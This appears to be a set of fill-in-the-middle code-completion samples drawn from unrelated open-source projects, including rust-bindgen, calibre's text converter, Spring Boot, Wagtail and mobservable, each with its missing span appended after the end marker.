boss.findSubjectById(user.getSessionId(), user.getSubject().getId()); Collection<DashboardConfig> dashboardCollection = getDashboards(me); List<DashboardConfig> editableDashboardConfigs = new ArrayList<DashboardConfig>(); for (DashboardConfig config : dashboardCollection) { if (isEditable(me, config)) { editableDashboardConfigs.add(config); } } return editableDashboardConfigs; } @Transactional(readOnly = true) public List<Dashboard> findEditableDashboards(WebUser user, AuthzBoss boss) throws SessionNotFoundException, SessionTimeoutException, PermissionException, 
RemoteException { List<DashboardConfig> dashboardConfigs = findEditableDashboardConfigs(user, boss); List<Dashboard> editableDashboards = new ArrayList<Dashboard>(); for (DashboardConfig config : dashboardConfigs) { Dashboard dashboard = new Dashboard(); dashboard.set_name(config.getName()); dashboard.setId(config.getId()); editableDashboards.add(dashboard); } return editableDashboards; } /** * Find a given dashboard by its id * @param id the id of the dashboard * @param user current user * @param boss the authzboss * @return the DashboardConfig of the corresponding DashboardId or null if * none */ @Transactional(readOnly = true) public DashboardConfig findDashboard(Integer id, WebUser user, AuthzBoss boss) { Collection<DashboardConfig> dashboardCollection; try { AuthzSubject me = boss.findSubjectById(user.getSessionId(), user.getSubject().getId()); dashboardCollection = getDashboards(me); } catch (Exception e) { return null; } for (DashboardConfig config : dashboardCollection) { if (config.getId().equals(id)) { return config; } } return null; } }<|fim▁end|>
@Transactional(readOnly = true) public ConfigResponse getRssUserPreferences(String user, String token) throws LoginException { ConfigResponse preferences;
<|file_name|>multiple-trait-bounds.rs<|end_file_name|><|fim▁begin|>// Copyright 2014 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT.<|fim▁hole|>// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. fn f<T:Eq + Ord>(_: T) { } pub fn main() { f(3); }<|fim▁end|>
//
<|file_name|>test_db_backend.py<|end_file_name|><|fim▁begin|>from __future__ import absolute_import, unicode_literals import unittest from django.test import TestCase <|fim▁hole|>from .test_backends import BackendTests class TestDBBackend(BackendTests, TestCase): backend_path = 'wagtail.wagtailsearch.backends.db' @unittest.expectedFailure def test_callable_indexed_field(self): super(TestDBBackend, self).test_callable_indexed_field() @unittest.expectedFailure def test_update_index_command(self): super(TestDBBackend, self).test_update_index_command() def test_annotate_score(self): results = self.backend.search("Hello", models.SearchTest).annotate_score('_score') for result in results: # DB backend doesn't do scoring, so annotate_score should just add None self.assertIsNone(result._score)<|fim▁end|>
from wagtail.tests.search import models
<|file_name|>var.rs<|end_file_name|><|fim▁begin|>//! Intermediate representation of variables. use super::super::codegen::MacroTypeVariation; use super::context::{BindgenContext, TypeId}; use super::dot::DotAttributes; use super::function::cursor_mangling; use super::int::IntKind; use super::item::Item; use super::ty::{FloatKind, TypeKind}; use crate::callbacks::MacroParsingBehavior; use crate::clang; use crate::clang::ClangToken; use crate::parse::{ ClangItemParser, ClangSubItemParser, ParseError, ParseResult, }; use cexpr; use std::io; use std::num::Wrapping; /// The type for a constant variable. #[derive(Debug)] pub enum VarType { /// A boolean. Bool(bool), /// An integer. Int(i64), /// A floating point number. Float(f64), /// A character. Char(u8), /// A string, not necessarily well-formed utf-8. String(Vec<u8>), } /// A `Var` is our intermediate representation of a variable. #[derive(Debug)] pub struct Var { /// The name of the variable. name: String, /// The mangled name of the variable. mangled_name: Option<String>, /// The type of the variable. ty: TypeId, /// The value of the variable, that needs to be suitable for `ty`. val: Option<VarType>, /// Whether this variable is const. is_const: bool, } impl Var { /// Construct a new `Var`. pub fn new( name: String, mangled_name: Option<String>, ty: TypeId, val: Option<VarType>, is_const: bool, ) -> Var { assert!(!name.is_empty()); Var { name, mangled_name, ty, val, is_const, } } /// Is this variable `const` qualified? pub fn is_const(&self) -> bool { self.is_const } /// The value of this constant variable, if any. pub fn val(&self) -> Option<&VarType> { self.val.as_ref() } /// Get this variable's type. pub fn ty(&self) -> TypeId { self.ty } /// Get this variable's name. pub fn name(&self) -> &str { &self.name } /// Get this variable's mangled name. pub fn mangled_name(&self) -> Option<&str> { self.mangled_name.as_deref() } } impl DotAttributes for Var { fn dot_attributes<W>( &self, _ctx: &BindgenContext, out: &mut W, ) -> io::Result<()> where W: io::Write, { if self.is_const { writeln!(out, "<tr><td>const</td><td>true</td></tr>")?; } if let Some(ref mangled) = self.mangled_name { writeln!( out, "<tr><td>mangled name</td><td>{}</td></tr>", mangled )?; } Ok(()) } } fn default_macro_constant_type(ctx: &BindgenContext, value: i64) -> IntKind { if value < 0 || ctx.options().default_macro_constant_type == MacroTypeVariation::Signed { if value < i32::min_value() as i64 || value > i32::max_value() as i64 { IntKind::I64 } else if !ctx.options().fit_macro_constants || value < i16::min_value() as i64 || value > i16::max_value() as i64 { IntKind::I32 } else if value < i8::min_value() as i64 || value > i8::max_value() as i64 { IntKind::I16 } else { IntKind::I8 } } else if value > u32::max_value() as i64 { IntKind::U64 } else if !ctx.options().fit_macro_constants || value > u16::max_value() as i64 { IntKind::U32 } else if value > u8::max_value() as i64 { IntKind::U16 } else { IntKind::U8 } } /// Parses tokens from a CXCursor_MacroDefinition pointing into a function-like /// macro, and calls the func_macro callback. fn handle_function_macro( cursor: &clang::Cursor, callbacks: &dyn crate::callbacks::ParseCallbacks, ) { let is_closing_paren = |t: &ClangToken| { // Test cheap token kind before comparing exact spellings. 
t.kind == clang_sys::CXToken_Punctuation && t.spelling() == b")" }; let tokens: Vec<_> = cursor.tokens().iter().collect(); if let Some(boundary) = tokens.iter().position(is_closing_paren) { let mut spelled = tokens.iter().map(ClangToken::spelling); // Add 1, to convert index to length. let left = spelled.by_ref().take(boundary + 1); let left = left.collect::<Vec<_>>().concat(); if let Ok(left) = String::from_utf8(left) { let right: Vec<_> = spelled.collect(); callbacks.func_macro(&left, &right); } } } impl ClangSubItemParser for Var { fn parse( cursor: clang::Cursor, ctx: &mut BindgenContext, ) -> Result<ParseResult<Self>, ParseError> { use cexpr::expr::EvalResult; use cexpr::literal::CChar; use clang_sys::*; match cursor.kind() { CXCursor_MacroDefinition => { if let Some(callbacks) = ctx.parse_callbacks() { match callbacks.will_parse_macro(&cursor.spelling()) { MacroParsingBehavior::Ignore => { return Err(ParseError::Continue); } MacroParsingBehavior::Default => {} } if cursor.is_macro_function_like() { handle_function_macro(&cursor, callbacks); // We handled the macro, skip macro processing below. return Err(ParseError::Continue); } } let value = parse_macro(ctx, &cursor); let (id, value) = match value { Some(v) => v, None => return Err(ParseError::Continue), }; assert!(!id.is_empty(), "Empty macro name?"); let previously_defined = ctx.parsed_macro(&id); // NB: It's important to "note" the macro even if the result is // not an integer, otherwise we might loose other kind of // derived macros. ctx.note_parsed_macro(id.clone(), value.clone()); if previously_defined { let name = String::from_utf8(id).unwrap(); warn!("Duplicated macro definition: {}", name); return Err(ParseError::Continue); } // NOTE: Unwrapping, here and above, is safe, because the // identifier of a token comes straight from clang, and we // enforce utf8 there, so we should have already panicked at // this point. let name = String::from_utf8(id).unwrap(); let (type_kind, val) = match value { EvalResult::Invalid => return Err(ParseError::Continue), EvalResult::Float(f) => { (TypeKind::Float(FloatKind::Double), VarType::Float(f)) } EvalResult::Char(c) => { let c = match c { CChar::Char(c) => { assert_eq!(c.len_utf8(), 1); c as u8 } CChar::Raw(c) => { assert!(c <= ::std::u8::MAX as u64); c as u8 } }; (TypeKind::Int(IntKind::U8), VarType::Char(c)) } EvalResult::Str(val) => { let char_ty = Item::builtin_type( TypeKind::Int(IntKind::U8), true, ctx, ); if let Some(callbacks) = ctx.parse_callbacks() { callbacks.str_macro(&name, &val); } (TypeKind::Pointer(char_ty), VarType::String(val)) } EvalResult::Int(Wrapping(value)) => { let kind = ctx .parse_callbacks() .and_then(|c| c.int_macro(&name, value)) .unwrap_or_else(|| { default_macro_constant_type(ctx, value) }); (TypeKind::Int(kind), VarType::Int(value)) } }; let ty = Item::builtin_type(type_kind, true, ctx);<|fim▁hole|> Var::new(name, None, ty, Some(val), true), Some(cursor), )) } CXCursor_VarDecl => { let name = cursor.spelling(); if name.is_empty() { warn!("Empty constant name?"); return Err(ParseError::Continue); } let ty = cursor.cur_type(); // TODO(emilio): do we have to special-case constant arrays in // some other places? let is_const = ty.is_const() || (ty.kind() == CXType_ConstantArray && ty.elem_type() .map_or(false, |element| element.is_const())); let ty = match Item::from_ty(&ty, cursor, None, ctx) { Ok(ty) => ty, Err(e) => { assert_eq!( ty.kind(), CXType_Auto, "Couldn't resolve constant type, and it \ wasn't an nondeductible auto type!" 
); return Err(e); } }; // Note: Ty might not be totally resolved yet, see // tests/headers/inner_const.hpp // // That's fine because in that case we know it's not a literal. let canonical_ty = ctx .safe_resolve_type(ty) .and_then(|t| t.safe_canonical_type(ctx)); let is_integer = canonical_ty.map_or(false, |t| t.is_integer()); let is_float = canonical_ty.map_or(false, |t| t.is_float()); // TODO: We could handle `char` more gracefully. // TODO: Strings, though the lookup is a bit more hard (we need // to look at the canonical type of the pointee too, and check // is char, u8, or i8 I guess). let value = if is_integer { let kind = match *canonical_ty.unwrap().kind() { TypeKind::Int(kind) => kind, _ => unreachable!(), }; let mut val = cursor.evaluate().and_then(|v| v.as_int()); if val.is_none() || !kind.signedness_matches(val.unwrap()) { let tu = ctx.translation_unit(); val = get_integer_literal_from_cursor(&cursor, tu); } val.map(|val| { if kind == IntKind::Bool { VarType::Bool(val != 0) } else { VarType::Int(val) } }) } else if is_float { cursor .evaluate() .and_then(|v| v.as_double()) .map(VarType::Float) } else { cursor .evaluate() .and_then(|v| v.as_literal_string()) .map(VarType::String) }; let mangling = cursor_mangling(ctx, &cursor); let var = Var::new(name, mangling, ty, value, is_const); Ok(ParseResult::New(var, Some(cursor))) } _ => { /* TODO */ Err(ParseError::Continue) } } } } /// Try and parse a macro using all the macros parsed until now. fn parse_macro( ctx: &BindgenContext, cursor: &clang::Cursor, ) -> Option<(Vec<u8>, cexpr::expr::EvalResult)> { use cexpr::expr; let cexpr_tokens = cursor.cexpr_tokens(); let parser = expr::IdentifierParser::new(ctx.parsed_macros()); match parser.macro_definition(&cexpr_tokens) { Ok((_, (id, val))) => Some((id.into(), val)), _ => None, } } fn parse_int_literal_tokens(cursor: &clang::Cursor) -> Option<i64> { use cexpr::expr; use cexpr::expr::EvalResult; let cexpr_tokens = cursor.cexpr_tokens(); // TODO(emilio): We can try to parse other kinds of literals. match expr::expr(&cexpr_tokens) { Ok((_, EvalResult::Int(Wrapping(val)))) => Some(val), _ => None, } } fn get_integer_literal_from_cursor( cursor: &clang::Cursor, unit: &clang::TranslationUnit, ) -> Option<i64> { use clang_sys::*; let mut value = None; cursor.visit(|c| { match c.kind() { CXCursor_IntegerLiteral | CXCursor_UnaryOperator => { value = parse_int_literal_tokens(&c); } CXCursor_UnexposedExpr => { value = get_integer_literal_from_cursor(&c, unit); } _ => (), } if value.is_some() { CXChildVisit_Break } else { CXChildVisit_Continue } }); value }<|fim▁end|>
Ok(ParseResult::New(
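default_macro_constant_type in the Rust row above picks the narrowest integer kind that can hold a macro's value, preferring signed kinds for negative values. A simplified Python sketch of that width fitting (the original also honors a signed-by-default mode and the fit_macro_constants option; kind names follow the IntKind variants):

def default_macro_constant_type(value, fit=True):
    if value < 0:
        for kind, bits in (("I8", 8), ("I16", 16), ("I32", 32)):
            if not fit and bits < 32:
                continue
            if -(1 << (bits - 1)) <= value < (1 << (bits - 1)):
                return kind
        return "I64"
    for kind, bits in (("U8", 8), ("U16", 16), ("U32", 32)):
        if not fit and bits < 32:
            continue
        if value < (1 << bits):
            return kind
    return "U64"

assert default_macro_constant_type(200) == "U8"
assert default_macro_constant_type(-40000) == "I32"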
<|file_name|>lib.rs<|end_file_name|><|fim▁begin|>// Copyright 2014 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. #![crate_name = "rustrt"] #![license = "MIT/ASL2"] #![crate_type = "rlib"] #![crate_type = "dylib"] #![doc(html_logo_url = "http://www.rust-lang.org/logos/rust-logo-128x128-blk-v2.png", html_favicon_url = "http://www.rust-lang.org/favicon.ico", html_root_url = "http://doc.rust-lang.org/master/")] #![feature(macro_rules, phase, globs, thread_local, managed_boxes, asm)] #![feature(linkage, lang_items, unsafe_destructor, default_type_params)] #![feature(import_shadowing)] #![no_std] #![experimental] #[phase(plugin, link)] extern crate core; extern crate alloc; extern crate libc; extern crate collections; #[cfg(test)] extern crate realrustrt = "rustrt"; #[cfg(test)] extern crate test; #[cfg(test)] extern crate native; #[cfg(test)] #[phase(plugin, link)] extern crate std; pub use self::util::{Stdio, Stdout, Stderr}; pub use self::unwind::{begin_unwind, begin_unwind_fmt}; use core::prelude::*; use alloc::boxed::Box; use core::any::Any; use task::{Task, BlockedTask, TaskOpts}; mod macros; mod at_exit_imp; mod local_ptr; mod thread_local_storage; mod util; mod libunwind; pub mod args; pub mod bookkeeping; pub mod c_str; pub mod exclusive; pub mod local; pub mod local_data; pub mod local_heap; pub mod mutex; pub mod rtio; pub mod stack; pub mod task; pub mod thread; pub mod unwind; /// The interface to the current runtime. /// /// This trait is used as the abstraction between 1:1 and M:N scheduling. The /// two independent crates, libnative and libgreen, both have objects which /// implement this trait. The goal of this trait is to encompass all the /// fundamental differences in functionality between the 1:1 and M:N runtime /// modes. pub trait Runtime { // Necessary scheduling functions, used for channels and blocking I/O // (sometimes). fn yield_now(self: Box<Self>, cur_task: Box<Task>); fn maybe_yield(self: Box<Self>, cur_task: Box<Task>); fn deschedule(self: Box<Self>, times: uint, cur_task: Box<Task>,<|fim▁hole|> fn reawaken(self: Box<Self>, to_wake: Box<Task>); // Miscellaneous calls which are very different depending on what context // you're in. fn spawn_sibling(self: Box<Self>, cur_task: Box<Task>, opts: TaskOpts, f: proc():Send); fn local_io<'a>(&'a mut self) -> Option<rtio::LocalIo<'a>>; /// The (low, high) edges of the current stack. fn stack_bounds(&self) -> (uint, uint); // (lo, hi) fn can_block(&self) -> bool; // FIXME: This is a serious code smell and this should not exist at all. fn wrap(self: Box<Self>) -> Box<Any+'static>; } /// The default error code of the rust runtime if the main task fails instead /// of exiting cleanly. pub static DEFAULT_ERROR_CODE: int = 101; /// One-time runtime initialization. /// /// Initializes global state, including frobbing /// the crate's logging flags, registering GC /// metadata, and storing the process arguments. pub fn init(argc: int, argv: *const *const u8) { // FIXME: Derefing these pointers is not safe. // Need to propagate the unsafety to `start`. 
unsafe { args::init(argc, argv); local_ptr::init(); at_exit_imp::init(); } // FIXME(#14344) this shouldn't be necessary collections::fixme_14344_be_sure_to_link_to_collections(); alloc::fixme_14344_be_sure_to_link_to_collections(); libc::issue_14344_workaround(); } /// Enqueues a procedure to run when the runtime is cleaned up /// /// The procedure passed to this function will be executed as part of the /// runtime cleanup phase. For normal rust programs, this means that it will run /// after all other tasks have exited. /// /// The procedure is *not* executed with a local `Task` available to it, so /// primitives like logging, I/O, channels, spawning, etc, are *not* available. /// This is meant for "bare bones" usage to clean up runtime details, this is /// not meant as a general-purpose "let's clean everything up" function. /// /// It is forbidden for procedures to register more `at_exit` handlers when they /// are running, and doing so will lead to a process abort. pub fn at_exit(f: proc():Send) { at_exit_imp::push(f); } /// One-time runtime cleanup. /// /// This function is unsafe because it performs no checks to ensure that the /// runtime has completely ceased running. It is the responsibility of the /// caller to ensure that the runtime is entirely shut down and nothing will be /// poking around at the internal components. /// /// Invoking cleanup while portions of the runtime are still in use may cause /// undefined behavior. pub unsafe fn cleanup() { bookkeeping::wait_for_other_tasks(); at_exit_imp::run(); args::cleanup(); local_ptr::cleanup(); } // FIXME: these probably shouldn't be public... #[doc(hidden)] pub mod shouldnt_be_public { #[cfg(not(test))] pub use super::local_ptr::native::maybe_tls_key; #[cfg(not(windows), not(target_os = "android"), not(target_os = "ios"))] pub use super::local_ptr::compiled::RT_TLS_PTR; } #[cfg(not(test))] mod std { pub use core::{fmt, option, cmp}; }<|fim▁end|>
f: |BlockedTask| -> Result<(), BlockedTask>);
<|file_name|>MaxArithmeticProgression.py<|end_file_name|><|fim▁begin|>''' Created on May 20, 2012 @author: Jason Huang ''' <|fim▁hole|>#The sequence S1, S2, …, Sk is called an arithmetic progression if #Sj+1 − Sj is a constant if __name__ == '__main__': pass<|fim▁end|>
#Given an array of integers A, give an algorithm to find the longest Arithmetic progression in it, i.e find a sequence i1 < i2 < … < ik, such that #A[i1], A[i2], …, A[ik] forms an arithmetic progression, and k is the largest possible.
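The row above poses the longest-arithmetic-progression problem but leaves the body as pass. A standard O(n^2) dynamic-programming sketch over the sorted array, where dp[j][d] is the length of the longest progression ending at index j with common difference d:

def longest_arith_progression(arr):
    if len(arr) < 2:
        return len(arr)
    arr = sorted(arr)
    best = 2
    # dp[j] maps a common difference d to the AP length ending at arr[j].
    dp = [dict() for _ in arr]
    for j in range(1, len(arr)):
        for i in range(j):
            d = arr[j] - arr[i]
            dp[j][d] = dp[i].get(d, 1) + 1
            best = max(best, dp[j][d])
    return best

assert longest_arith_progression([1, 7, 10, 13, 14, 19]) == 4  # 1, 7, 13, 19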
<|file_name|>RunProcessCommand.java<|end_file_name|><|fim▁begin|>/* * Copyright 2012-2018 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.springframework.boot.cli.command.shell; import java.io.IOException; import java.util.Arrays; import java.util.Collection; import org.springframework.boot.cli.command.AbstractCommand; import org.springframework.boot.cli.command.Command; import org.springframework.boot.cli.command.status.ExitStatus; import org.springframework.boot.loader.tools.RunProcess; import org.springframework.util.StringUtils; /** * Special {@link Command} used to run a process from the shell. NOTE: this command is not * directly installed into the shell. * * @author Phillip Webb */ class RunProcessCommand extends AbstractCommand { private final String[] command; private volatile RunProcess process; <|fim▁hole|> @Override public ExitStatus run(String... args) throws Exception { return run(Arrays.asList(args)); } protected ExitStatus run(Collection<String> args) throws IOException { this.process = new RunProcess(this.command); int code = this.process.run(true, StringUtils.toStringArray(args)); if (code == 0) { return ExitStatus.OK; } else { return new ExitStatus(code, "EXTERNAL_ERROR"); } } public boolean handleSigInt() { return this.process.handleSigInt(); } }<|fim▁end|>
RunProcessCommand(String... command) { super(null, null); this.command = command; }
<|file_name|>options.js<|end_file_name|><|fim▁begin|>angular.module('Reader.services.options', []) .factory('options', function($rootScope, $q) { var controllerObj = {}; options.onChange(function (changes) { $rootScope.$apply(function () { for (var property in changes) { controllerObj[property] = changes[property].newValue; } }); }); return { get: function (callback) { options.get(function (values) { $rootScope.$apply(function () { angular.copy(values, controllerObj); if (callback instanceof Function) { callback(controllerObj); } }); }); return controllerObj; }, <|fim▁hole|> enableSync: options.enableSync, isSyncEnabled: options.isSyncEnabled }; });<|fim▁end|>
set: function (values) { options.set(values); },
<|file_name|>processor.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- __license__ = 'GPL v3' __copyright__ = '2009, John Schember <[email protected]>' __docformat__ = 'restructuredtext en' ''' Read content from txt file. ''' import os, re from calibre import prepare_string_for_xml, isbytestring from calibre.ebooks.metadata.opf2 import OPFCreator from calibre.ebooks.conversion.preprocess import DocAnalysis from calibre.utils.cleantext import clean_ascii_chars HTML_TEMPLATE = u'<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title>%s </title></head><body>\n%s\n</body></html>' def clean_txt(txt): ''' Run transformations on the text to put it into consistent state. ''' if isbytestring(txt): txt = txt.decode('utf-8', 'replace') # Strip whitespace from the end of the line. Also replace # all line breaks with \n. txt = '\n'.join([line.rstrip() for line in txt.splitlines()]) # Replace whitespace at the beginning of the line with &nbsp; txt = re.sub('(?m)(?<=^)([ ]{2,}|\t+)(?=.)', '&nbsp;' * 4, txt) # Condense redundant spaces txt = re.sub('[ ]{2,}', ' ', txt) # Remove blank space from the beginning and end of the document. txt = re.sub('^\s+(?=.)', '', txt) txt = re.sub('(?<=.)\s+$', '', txt) # Remove excessive line breaks. txt = re.sub('\n{5,}', '\n\n\n\n', txt) #remove ASCII invalid chars : 0 to 8 and 11-14 to 24 txt = clean_ascii_chars(txt) return txt def split_txt(txt, epub_split_size_kb=0): ''' Ensure there are split points for converting to EPUB. A misdetected paragraph type can result in the entire document being one giant paragraph. In this case the EPUB parser will not be able to determine where to split the file to accomidate the EPUB file size limitation and will fail. ''' #Takes care if there is no point to split if epub_split_size_kb > 0: if isinstance(txt, unicode): txt = txt.encode('utf-8') length_byte = len(txt) #Calculating the average chunk value for easy splitting as EPUB (+2 as a safe margin) chunk_size = long(length_byte / (int(length_byte / (epub_split_size_kb * 1024) ) + 2 )) #if there are chunks with a superior size then go and break if (len(filter(lambda x: len(x) > chunk_size, txt.split('\n\n')))) : txt = '\n\n'.join([split_string_separator(line, chunk_size) for line in txt.split('\n\n')]) if isbytestring(txt): txt = txt.decode('utf-8') return txt def convert_basic(txt, title='', epub_split_size_kb=0): ''' Converts plain text to html by putting all paragraphs in <p> tags. It condense and retains blank lines when necessary. Requires paragraphs to be in single line format. ''' txt = clean_txt(txt) txt = split_txt(txt, epub_split_size_kb) lines = [] blank_count = 0 # Split into paragraphs based on having a blank line between text. 
    for line in txt.split('\n'):
        if line.strip():
            blank_count = 0
            lines.append(u'<p>%s</p>' % prepare_string_for_xml(line.replace('\n', ' ')))
        else:
            blank_count += 1
            if blank_count == 2:
                lines.append(u'<p>&nbsp;</p>')

    return HTML_TEMPLATE % (title, u'\n'.join(lines))

def convert_markdown(txt, title='', disable_toc=False):
    from calibre.ebooks.markdown import markdown
    extensions=['footnotes', 'tables']<|fim▁hole|>
        extensions, safe_mode=False)
    return HTML_TEMPLATE % (title, md.convert(txt))

def convert_textile(txt, title=''):
    from calibre.ebooks.textile import textile
    html = textile(txt, encoding='utf-8')
    return HTML_TEMPLATE % (title, html)

def normalize_line_endings(txt):
    txt = txt.replace('\r\n', '\n')
    txt = txt.replace('\r', '\n')
    return txt

def separate_paragraphs_single_line(txt):
    txt = txt.replace('\n', '\n\n')
    return txt

def separate_paragraphs_print_formatted(txt):
    txt = re.sub(u'(?miu)^(?P<indent>\t+|[ ]{2,})(?=.)', lambda mo: '\n%s' % mo.group('indent'), txt)
    return txt

def separate_hard_scene_breaks(txt):
    def sep_break(line):
        if len(line.strip()) > 0:
            return '\n%s\n' % line
        else:
            return line
    txt = re.sub(u'(?miu)^[ \t-=~\/_]+$', lambda mo: sep_break(mo.group()), txt)
    return txt

def block_to_single_line(txt):
    txt = re.sub(r'(?<=.)\n(?=.)', ' ', txt)
    return txt

def preserve_spaces(txt):
    '''
    Replaces runs of multiple spaces with &nbsp; entities.
    '''
    txt = re.sub('(?P<space>[ ]{2,})', lambda mo: ' ' + ('&nbsp;' * (len(mo.group('space')) - 1)), txt)
    txt = txt.replace('\t', '&nbsp;&nbsp;&nbsp;&nbsp;')
    return txt

def remove_indents(txt):
    '''
    Remove whitespace at the beginning of each line.
    '''
    txt = re.sub('(?miu)^\s+', '', txt)
    return txt

def opf_writer(path, opf_name, manifest, spine, mi):
    opf = OPFCreator(path, mi)
    opf.create_manifest(manifest)
    opf.create_spine(spine)
    with open(os.path.join(path, opf_name), 'wb') as opffile:
        opf.render(opffile)

def split_string_separator(txt, size):
    '''
    Splits the text by inserting \n\n at points spaced by the given size.
    '''
    if len(txt) > size:
        txt = ''.join([re.sub(u'\.(?P<ends>[^.]*)$', '.\n\n\g<ends>', txt[i:i+size], 1) for i in xrange(0, len(txt), size)])
    return txt

def detect_paragraph_type(txt):
    '''
    Tries to determine the paragraph type of the document.

    block: Paragraphs are separated by a blank line.
    single: Each line is a paragraph.
    print: Each paragraph starts with 2+ spaces or a tab and ends when a
    new paragraph is reached.
    unformatted: most lines have hard line breaks, few/no blank lines or indents

    returns block, single, print, unformatted
    '''
    txt = txt.replace('\r\n', '\n')
    txt = txt.replace('\r', '\n')
    txt_line_count = len(re.findall('(?mu)^\s*.+$', txt))

    # Check for hard line breaks - true if 55% of the doc breaks in the same region
    docanalysis = DocAnalysis('txt', txt)
    hardbreaks = docanalysis.line_histogram(.55)

    if hardbreaks:
        # Determine print percentage
        tab_line_count = len(re.findall('(?mu)^(\t|\s{2,}).+$', txt))
        print_percent = tab_line_count / float(txt_line_count)

        # Determine block percentage
        empty_line_count = len(re.findall('(?mu)^\s*$', txt))
        block_percent = empty_line_count / float(txt_line_count)

        # Compare the two types - the type with the larger number of instances wins;
        # when one or the other represents the vast majority of the document, neither wins
        if print_percent >= block_percent:
            if .15 <= print_percent <= .75:
                return 'print'
        elif .15 <= block_percent <= .75:
            return 'block'

        # Assume unformatted text with hardbreaks if nothing else matches
        return 'unformatted'

    # return single if hardbreaks is false
    return 'single'

def detect_formatting_type(txt):
    '''
    Tries to determine the formatting of the document.

    markdown: Markdown formatting is used.
    textile: Textile formatting is used.
    heuristic: When none of the above formatting types are
    detected, heuristic is returned.
    '''
    # Keep a count of the number of format-specific objects
    # that are found in the text.
    markdown_count = 0
    textile_count = 0

    # Check for markdown
    # Headings
    markdown_count += len(re.findall('(?mu)^#+', txt))
    markdown_count += len(re.findall('(?mu)^=+$', txt))
    markdown_count += len(re.findall('(?mu)^-+$', txt))
    # Images
    markdown_count += len(re.findall('(?u)!\[.*?\](\[|\()', txt))
    # Links
    markdown_count += len(re.findall('(?u)^|[^!]\[.*?\](\[|\()', txt))

    # Check for textile
    # Headings
    textile_count += len(re.findall(r'(?mu)^h[1-6]\.', txt))
    # Block quote.
    textile_count += len(re.findall(r'(?mu)^bq\.', txt))
    # Images
    textile_count += len(re.findall(r'(?mu)(?<=\!)\S+(?=\!)', txt))
    # Links
    textile_count += len(re.findall(r'"[^"]*":\S+', txt))
    # paragraph blocks
    textile_count += len(re.findall(r'(?mu)^p(<|<>|=|>)?\. ', txt))

    # Decide if either markdown or textile is used in the text
    # based on the number of unique formatting elements found.
    if markdown_count > 5 or textile_count > 5:
        if markdown_count > textile_count:
            return 'markdown'
        else:
            return 'textile'

    return 'heuristic'<|fim▁end|>
if not disable_toc: extensions.append('toc') md = markdown.Markdown(
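detect_paragraph_type in the record above decides between 'print' and 'block' layout by comparing two line ratios. A self-contained sketch of just those ratios using plain re — the sample string and the paragraph_ratios name are illustrative:

import re

def paragraph_ratios(txt):
    # Non-blank lines, lines opening with a tab or 2+ spaces
    # (print-formatted), and blank lines (block-formatted),
    # matching the counts used in detect_paragraph_type.
    total = len(re.findall(r'(?mu)^\s*.+$', txt))
    printed = len(re.findall(r'(?mu)^(\t|\s{2,}).+$', txt))
    blank = len(re.findall(r'(?mu)^\s*$', txt))
    return printed / float(total), blank / float(total)

sample = "First paragraph.\n\nSecond paragraph.\n\nThird.\n"
print(paragraph_ratios(sample))  # low print ratio, noticeable block ratio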
<|file_name|>game.js<|end_file_name|><|fim▁begin|><|fim▁hole|><|fim▁end|>
//= require phaser
<|file_name|>observableview.ts<|end_file_name|><|fim▁begin|>/** * mobservable * (c) 2015 - Michel Weststrate * https://github.com/mweststrate/mobservable */ namespace mobservable { export namespace _ { export function throwingViewSetter() { throw new Error(`[mobservable.view '${this.context.name}'] View functions do not accept new values`); } export class ObservableView<T> extends ViewNode { private isComputing = false; private hasError = false; protected _value: T; protected changeEvent = new SimpleEventEmitter(); constructor(protected func:()=>T, private scope: Object, context:Mobservable.IContextInfoStruct, private compareStructural) { super(context); } get():T { if (this.isComputing) throw new Error(`[mobservable.view '${this.context.name}'] Cycle detected`); if (this.isSleeping) { if (_.isComputingView()) { // somebody depends on the outcome of this computation this.wakeUp(); // note: wakeup triggers a compute this.notifyObserved(); } else { // nobody depends on this computable; // so just compute fresh value and continue to sleep this.wakeUp(); this.tryToSleep(); } } else { // we are already up to date, somebody is just inspecting our current value this.notifyObserved(); } if (this.hasCycle) throw new Error(`[mobservable.view '${this.context.name}'] Cycle detected`); if (this.hasError) {<|fim▁hole|> return this._value; } set() { throwingViewSetter.call(this); } compute() { var newValue:T; try { // this cycle detection mechanism is primarily for lazy computed values; other cycles are already detected in the dependency tree if (this.isComputing) throw new Error(`[mobservable.view '${this.context.name}'] Cycle detected`); this.isComputing = true; newValue = this.func.call(this.scope); this.hasError = false; } catch (e) { this.hasError = true; console.error(`[mobservable.view '${this.context.name}'] Caught error during computation: `, e, "View function:", this.func.toString()); console.trace(); if (e instanceof Error) newValue = e; else { newValue = <T><any> new Error(`[mobservable.view '${this.context.name}'] Error during computation (see error.cause) in ` + this.func.toString()); (<any>newValue).cause = e; } } this.isComputing = false; const changed = this.compareStructural ? !deepEquals(newValue, this._value) : newValue !== this._value; if (changed) { var oldValue = this._value; this._value = newValue; this.changeEvent.emit(newValue, oldValue); return true; } return false; } observe(listener:(newValue:T, oldValue:T)=>void, fireImmediately=false):Lambda { this.setRefCount(+1); // awake if (fireImmediately) listener(this.get(), undefined); var disposer = this.changeEvent.on(listener); return once(() => { this.setRefCount(-1); disposer(); }); } asPropertyDescriptor(): PropertyDescriptor { return { configurable: false, enumerable: false, get: () => this.get(), set: throwingViewSetter } } toString() { return `ComputedObservable[${this.context.name}:${this._value}] ${this.func.toString()}`; } } } }<|fim▁end|>
if (logLevel > 0) console.error(`[mobservable.view '${this.context.name}'] Rethrowing caught exception to observer: ${this._value}${(<any>this._value).cause||''}`); throw this._value; }
